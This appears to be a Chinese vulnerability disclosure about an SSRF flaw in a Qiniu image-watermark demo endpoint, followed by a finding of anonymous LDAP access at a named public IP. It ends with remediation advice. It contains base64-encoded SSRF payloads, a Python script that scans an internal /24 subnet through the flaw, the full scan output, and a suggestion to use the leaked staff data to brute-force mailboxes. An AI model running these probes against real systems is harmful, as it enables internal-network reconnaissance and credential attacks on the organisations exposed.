【漏洞学习——SSRF】七牛某站SSRF可探测内网

一、SSRF漏洞

有漏洞的貌似是一个测试站：/demo/qimage/index.html

存在SSRF漏洞接口的作用是先获取远程的图片，然后把图片制作成水印覆盖在当前图片上，用百度的logo做演示，效果如下：

/1234.jpg?watermark/1/image/aHR0cHM6Ly93d3cuYmFpZHUuY29tL2ltZy9iZF9sb2dvMS5wbmc=/dissolve/100/gravity/SouthEast

image后边的那串base64编码是你要探测的IP和端口，如何知道内网的IP呢。这里探测到七牛的一个IP存在elasticsearch未授权访问。

可知内网中至少存在这样一个网段：

172.30.251.168:9200

将http://172.30.251.168:9200编码为base64放在image后。

/1234.jpg?watermark/1/image/aHR0cDovLzE3Mi4zMC4yNTEuMTY4OjkyMDA=/dissolve/100/gravity/SouthEast

如果当前IP存活且端口开放的话，会返回501错误。如探测 http://172.30.251.168:9200

如果当前IP不存活或者端口不开放的话，会返回502错误。如探测 http://172.30.251.168:1356

经过测试总结出以下规律。

返回403——IP存活且端口开放，但是该目录禁止访问返回404——IP存活且端口开放，但是不存在该图片返回501——IP存活且端口开放返回502——IP不存活或者端口不开放

这里为了方便测试，写了一个探测172.30.251网段80端口是否开放的脚本，返回501错误的就是IP存活且端口开放。当然如果再深入些，可以通过探测程序的默认logo或者favicon.ico来判断目标是什么应用。

#coding=utf-8'''poc: qiniu_ssrfurl: /demo/qimage/index.html'''import requestsimport base64from IPy import IPmask = IP('172.30.251.0/24')for ip in mask:print ipb64Domain = base64.b64encode('http://' + str(ip))#print b64Domainreq = requests.get("/1234.jpg?watermark/1/image/%s/dissolve/100/gravity/SouthEast" % b64Domain)print req.text + "\n"qnfile = file('/tmp/qnscan.txt', 'a')qnfile.write(str(ip) + '\n' + str(req.text) + '\n\n')qnfile.close()

这是返回的结果

172.30.251.0{"error":"fetch image url failed and statusCode: 502"}172.30.251.1{"error":"fetch image url failed and statusCode: 502"}172.30.251.2{"error":"fetch image url failed and statusCode: 502"}172.30.251.3{"error":"fetch image url failed and statusCode: 502"}172.30.251.4{"error":"fetch image url failed and statusCode: 502"}172.30.251.5{"error":"fetch image url failed and statusCode: 502"}172.30.251.6{"error":"fetch image url failed and statusCode: 502"}172.30.251.7{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.8{"error":"fetch image url failed and statusCode: 502"}172.30.251.9{"error":"fetch image url failed and statusCode: 502"}172.30.251.10{"error":"fetch image url failed and statusCode: 502"}172.30.251.11{"error":"fetch image url failed and statusCode: 502"}172.30.251.12{"error":"fetch image url failed and statusCode: 502"}172.30.251.13{"error":"fetch image url failed and statusCode: 502"}172.30.251.14{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.15{"error":"fetch image url failed and statusCode: 502"}172.30.251.16{"error":"fetch image url failed and statusCode: 502"}172.30.251.17{"error":"fetch image url failed and statusCode: 502"}172.30.251.18{"error":"fetch image url failed and statusCode: 502"}172.30.251.19{"error":"fetch image url failed and statusCode: 502"}172.30.251.20{"error":"fetch image url failed and statusCode: 502"}172.30.251.21{"error":"fetch image url failed and statusCode: 502"}172.30.251.22{"error":"fetch image url failed and statusCode: 502"}172.30.251.23{"error":"fetch image url failed and statusCode: 403"}172.30.251.24{"error":"fetch image url failed and statusCode: 502"}172.30.251.25{"error":"fetch image url failed and statusCode: 502"}172.30.251.26{"error":"fetch image url failed and statusCode: 403"}172.30.251.27{"error":"fetch image url failed and statusCode: 502"}172.30.251.28{"error":"fetch image url failed and statusCode: 502"}172.30.251.29{"error":"fetch image url failed and statusCode: 502"}172.30.251.30{"error":"fetch image url failed and statusCode: 502"}172.30.251.31{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.32{"error":"fetch image url failed and statusCode: 502"}172.30.251.33{"error":"fetch image url failed and statusCode: 502"}172.30.251.34{"error":"fetch image url failed and statusCode: 502"}172.30.251.35{"error":"fetch image url failed and statusCode: 502"}172.30.251.36{"error":"fetch image url failed and statusCode: 502"}172.30.251.37{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.38{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.39{"error":"fetch image url failed and statusCode: 502"}172.30.251.40{"error":"fetch image url failed and statusCode: 502"}172.30.251.41{"error":"fetch image url failed and statusCode: 502"}172.30.251.42{"error":"fetch image url failed and statusCode: 502"}172.30.251.43{"error":"fetch image url failed and statusCode: 502"}172.30.251.44{"error":"fetch image url failed and statusCode: 502"}172.30.251.45{"error":"fetch image url failed and statusCode: 502"}172.30.251.46{"error":"fetch image url failed and statusCode: 502"}172.30.251.47{"error":"fetch image url failed and statusCode: 502"}172.30.251.48{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.49{"error":"fetch image url failed and statusCode: 502"}172.30.251.50{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.51{"error":"fetch image url failed and statusCode: 502"}172.30.251.52{"error":"fetch image url failed and statusCode: 502"}172.30.251.53{"error":"fetch image url failed and statusCode: 502"}172.30.251.54{"error":"fetch image url failed and statusCode: 502"}172.30.251.55{"error":"fetch image url failed and statusCode: 502"}172.30.251.56{"error":"fetch image url failed and statusCode: 502"}172.30.251.57{"error":"fetch image url failed and statusCode: 502"}172.30.251.58{"error":"fetch image url failed and statusCode: 502"}172.30.251.59{"error":"fetch image url failed and statusCode: 502"}172.30.251.60{"error":"fetch image url failed and statusCode: 502"}172.30.251.61{"error":"fetch image url failed and statusCode: 502"}172.30.251.62{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.63{"error":"fetch image url failed and statusCode: 502"}172.30.251.64{"error":"fetch image url failed and statusCode: 502"}172.30.251.65{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.66{"error":"fetch image url failed and statusCode: 502"}172.30.251.67{"error":"fetch image url failed and statusCode: 502"}172.30.251.68{"error":"fetch image url failed and statusCode: 502"}172.30.251.69{"error":"fetch image url failed and statusCode: 502"}172.30.251.70{"error":"fetch image url failed and statusCode: 502"}172.30.251.71{"error":"fetch image url failed and statusCode: 502"}172.30.251.72{"error":"fetch image url failed and statusCode: 502"}172.30.251.73{"error":"fetch image url failed and statusCode: 502"}172.30.251.74{"error":"fetch image url failed and statusCode: 502"}172.30.251.75{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.76{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.77{"error":"fetch image url failed and statusCode: 502"}172.30.251.78{"error":"fetch image url failed and statusCode: 502"}172.30.251.79{"error":"fetch image url failed and statusCode: 502"}172.30.251.80{"error":"fetch image url failed and statusCode: 502"}172.30.251.81{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.82{"error":"fetch image url failed and statusCode: 503"}172.30.251.83{"error":"fetch image url failed and statusCode: 502"}172.30.251.84{"error":"fetch image url failed and statusCode: 502"}172.30.251.85{"error":"fetch image url failed and statusCode: 502"}172.30.251.86{"error":"fetch image url failed and statusCode: 502"}172.30.251.87{"error":"fetch image url failed and statusCode: 502"}172.30.251.88{"error":"fetch image url failed and statusCode: 502"}172.30.251.89{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.90{"error":"fetch image url failed and statusCode: 502"}172.30.251.91{"error":"fetch image url failed and statusCode: 502"}172.30.251.92{"error":"fetch image url failed and statusCode: 502"}172.30.251.93{"error":"fetch image url failed and statusCode: 502"}172.30.251.94{"error":"fetch image url failed and statusCode: 502"}172.30.251.95{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.96{"error":"fetch image url failed and statusCode: 502"}172.30.251.97{"error":"fetch image url failed and statusCode: 502"}172.30.251.98{"error":"fetch image url failed and statusCode: 502"}172.30.251.99{"error":"fetch image url failed and statusCode: 502"}172.30.251.100{"error":"fetch image url failed and statusCode: 502"}172.30.251.101{"error":"fetch image url failed and statusCode: 502"}172.30.251.102{"error":"fetch image url failed and statusCode: 502"}172.30.251.103{"error":"fetch image url failed and statusCode: 502"}172.30.251.104{"error":"fetch image url failed and statusCode: 502"}172.30.251.105{"error":"fetch image url failed and statusCode: 502"}172.30.251.106{"error":"fetch image url failed and statusCode: 502"}172.30.251.107{"error":"fetch image url failed and statusCode: 502"}172.30.251.108{"error":"fetch image url failed and statusCode: 502"}172.30.251.109{"error":"fetch image url failed and statusCode: 502"}172.30.251.110{"error":"fetch image url failed and statusCode: 502"}172.30.251.111{"error":"fetch image url failed and statusCode: 502"}172.30.251.112{"error":"fetch image url failed and statusCode: 502"}172.30.251.113{"error":"fetch image url failed and statusCode: 502"}172.30.251.114{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-23441q7XWC6pITgES': No such file or directory @ error/constitute.c/ReadImage/540"}172.30.251.115{"error":"fetch image url failed and statusCode: 502"}172.30.251.116{"error":"fetch image url failed and statusCode: 404"}172.30.251.117{"error":"fetch image url failed and statusCode: 502"}172.30.251.118{"error":"fetch image url failed and statusCode: 502"}172.30.251.119{"error":"fetch image url failed and statusCode: 502"}172.30.251.120{"error":"fetch image url failed and statusCode: 502"}172.30.251.121{"error":"fetch image url failed and statusCode: 502"}172.30.251.122{"error":"fetch image url failed and statusCode: 502"}172.30.251.123{"error":"fetch image url failed and statusCode: 502"}172.30.251.124{"error":"fetch image url failed and statusCode: 502"}172.30.251.125{"error":"fetch image url failed and statusCode: 502"}172.30.251.126{"error":"fetch image url failed and statusCode: 502"}172.30.251.127{"error":"fetch image url failed and statusCode: 502"}172.30.251.128{"error":"fetch image url failed and statusCode: 502"}172.30.251.129{"error":"fetch image url failed and statusCode: 502"}172.30.251.130{"error":"fetch image url failed and statusCode: 502"}172.30.251.131{"error":"fetch image url failed and statusCode: 502"}172.30.251.132{"error":"fetch image url failed and statusCode: 502"}172.30.251.133{"error":"fetch image url failed and statusCode: 502"}172.30.251.134{"error":"fetch image url failed and statusCode: 502"}172.30.251.135{"error":"fetch image url failed and statusCode: 404"}172.30.251.136{"error":"fetch image url failed and statusCode: 502"}172.30.251.137{"error":"fetch image url failed and statusCode: 502"}172.30.251.138{"error":"fetch image url failed and statusCode: 502"}172.30.251.139{"error":"fetch image url failed and statusCode: 502"}172.30.251.140{"error":"fetch image url failed and statusCode: 502"}172.30.251.141{"error":"fetch image url failed and statusCode: 502"}172.30.251.142{"error":"fetch image url failed and statusCode: 502"}172.30.251.143{"error":"fetch image url failed and statusCode: 502"}172.30.251.144{"error":"fetch image url failed and statusCode: 502"}172.30.251.145{"error":"fetch image url failed and statusCode: 502"}172.30.251.146{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-5107kShQhExKivuz': No such file or directory @ error/constitute.c/ReadImage/540"}172.30.251.147{"error":"fetch image url failed and statusCode: 502"}172.30.251.148{"error":"fetch image url failed and statusCode: 502"}172.30.251.149{"error":"fetch image url failed and statusCode: 502"}172.30.251.150{"error":"fetch image url failed and statusCode: 502"}172.30.251.151{"error":"fetch image url failed and statusCode: 502"}172.30.251.152{"error":"fetch image url failed and statusCode: 502"}172.30.251.153{"error":"fetch image url failed and statusCode: 502"}172.30.251.154{"error":"fetch image url failed and statusCode: 502"}172.30.251.155{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.156{"error":"fetch image url failed and statusCode: 502"}172.30.251.157{"error":"fetch image url failed and statusCode: 502"}172.30.251.158{"error":"fetch image url failed and statusCode: 502"}172.30.251.159{"error":"fetch image url failed and statusCode: 502"}172.30.251.160{"error":"fetch image url failed and statusCode: 502"}172.30.251.161{"error":"fetch image url failed and statusCode: 502"}172.30.251.162{"error":"fetch image url failed and statusCode: 502"}172.30.251.163{"error":"fetch image url failed and statusCode: 502"}172.30.251.164{"error":"fetch image url failed and statusCode: 502"}172.30.251.165{"error":"fetch image url failed and statusCode: 502"}172.30.251.166{"error":"fetch image url failed and statusCode: 502"}172.30.251.167{"error":"fetch image url failed and statusCode: 502"}172.30.251.168{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.169{"error":"fetch image url failed and statusCode: 502"}172.30.251.170{"error":"fetch image url failed and statusCode: 502"}172.30.251.171{"error":"fetch image url failed and statusCode: 502"}172.30.251.172{"error":"fetch image url failed and statusCode: 502"}172.30.251.173{"error":"fetch image url failed and statusCode: 502"}172.30.251.174{"error":"fetch image url failed and statusCode: 502"}172.30.251.175{"error":"fetch image url failed and statusCode: 502"}172.30.251.176{"error":"fetch image url failed and statusCode: 502"}172.30.251.177{"error":"fetch image url failed and statusCode: 502"}172.30.251.178{"error":"fetch image url failed and statusCode: 502"}172.30.251.179{"error":"fetch image url failed and statusCode: 502"}172.30.251.180{"error":"fetch image url failed and statusCode: 502"}172.30.251.181{"error":"fetch image url failed and statusCode: 502"}172.30.251.182{"error":"fetch image url failed and statusCode: 502"}172.30.251.183{"error":"fetch image url failed and statusCode: 502"}172.30.251.184{"error":"unsupported format:unsupported format:ERROR_CODER: Entity 'nbsp' not defined\n `No such file or directory` @ error/svg.c/SVGError/2639"}172.30.251.185{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.186{"error":"fetch image url failed and statusCode: 502"}172.30.251.187{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.188{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.189{"error":"fetch image url failed and statusCode: 502"}172.30.251.190{"error":"fetch image url failed and statusCode: 502"}172.30.251.191{"error":"fetch image url failed and statusCode: 502"}172.30.251.192{"error":"fetch image url failed and statusCode: 502"}172.30.251.193{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.194{"error":"fetch image url failed and statusCode: 502"}172.30.251.195{"error":"fetch image url failed and statusCode: 502"}172.30.251.196{"error":"fetch image url failed and statusCode: 502"}172.30.251.197{"error":"fetch image url failed and statusCode: 502"}172.30.251.198{"error":"fetch image url failed and statusCode: 502"}172.30.251.199{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.200{"error":"fetch image url failed and statusCode: 502"}172.30.251.201{"error":"fetch image url failed and statusCode: 502"}172.30.251.202{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.203{"error":"fetch image url failed and statusCode: 502"}172.30.251.204{"error":"fetch image url failed and statusCode: 502"}172.30.251.205{"error":"fetch image url failed and statusCode: 502"}172.30.251.206{"error":"fetch image url failed and statusCode: 502"}172.30.251.207{"error":"fetch image url failed and statusCode: 502"}172.30.251.208{"error":"fetch image url failed and statusCode: 502"}172.30.251.209{"error":"fetch image url failed and statusCode: 502"}172.30.251.210{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.211{"error":"fetch image url failed and statusCode: 502"}172.30.251.212{"error":"fetch image url failed and statusCode: 502"}172.30.251.213{"error":"fetch image url failed and statusCode: 502"}172.30.251.214{"error":"fetch image url failed and statusCode: 502"}172.30.251.215{"error":"fetch image url failed and statusCode: 502"}172.30.251.216{"error":"fetch image url failed and statusCode: 502"}172.30.251.217{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-24069p9eQJObZhm7U': No such file or directory @ error/constitute.c/ReadImage/540"}172.30.251.218{"error":"fetch image url failed and statusCode: 502"}172.30.251.219{"error":"fetch image url failed and statusCode: 502"}172.30.251.220{"error":"fetch image url failed and statusCode: 502"}172.30.251.221{"error":"fetch image url failed and statusCode: 502"}172.30.251.222{"error":"fetch image url failed and statusCode: 502"}172.30.251.223{"error":"fetch image url failed and statusCode: 502"}172.30.251.224{"error":"fetch image url failed and statusCode: 502"}172.30.251.225{"error":"fetch image url failed and statusCode: 502"}172.30.251.226{"error":"fetch image url failed and statusCode: 502"}172.30.251.227{"error":"fetch image url failed and statusCode: 502"}172.30.251.228{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.229{"error":"fetch image url failed and statusCode: 502"}172.30.251.230{"error":"fetch image url failed and statusCode: 502"}172.30.251.231{"error":"fetch image url failed and statusCode: 502"}172.30.251.232{"error":"fetch image url failed and statusCode: 502"}172.30.251.233{"error":"fetch image url failed and statusCode: 502"}172.30.251.234{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.235{"error":"fetch image url failed and statusCode: 502"}172.30.251.236{"error":"fetch image url failed and statusCode: 502"}172.30.251.237{"error":"fetch image url failed and statusCode: 502"}172.30.251.238{"error":"fetch image url failed and statusCode: 502"}172.30.251.239{"error":"fetch image url failed and statusCode: 404"}172.30.251.240{"error":"fetch image url failed and statusCode: 403"}172.30.251.241{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}172.30.251.242{"error":"fetch image url failed and statusCode: 403"}172.30.251.243{"error":"fetch image url failed and statusCode: 502"}172.30.251.244{"error":"fetch image url failed and statusCode: 502"}172.30.251.245{"error":"fetch image url failed and statusCode: 502"}172.30.251.246{"error":"fetch image url failed and statusCode: 502"}172.30.251.247{"error":"fetch image url failed and statusCode: 502"}172.30.251.248{"error":"fetch image url failed and statusCode: 502"}172.30.251.249{"error":"fetch image url failed and statusCode: 502"}172.30.251.250{"error":"fetch image url failed and statusCode: 502"}172.30.251.251{"error":"fetch image url failed and statusCode: 502"}172.30.251.252{"error":"fetch image url failed and statusCode: 502"}172.30.251.253{"error":"fetch image url failed and statusCode: 502"}172.30.251.254{"error":"fetch image url failed and statusCode: 502"}172.30.251.255{"error":"fetch image url failed and statusCode: 502"}

二、LDAP匿名访问

IP：115.231.182.75

端口：389

可获取企业的所有人员信息，利用这些信息可以用来爆破邮箱或者使用ldap登录的应用。

在测试时，你们搭的一个洋葱的应用（115.231.182.75:8090)因为有漏洞，不小心测挂掉了，实在是抱歉。

修复方案

1. SSRF漏洞，可以统一下返回错误信息，避免用户可以根据错误信息来判断远端服务器的端口状态，且限制服务器访问的IP不能是内网IP。

2. Ldap漏洞，建议关掉Ldap的匿名访问功能。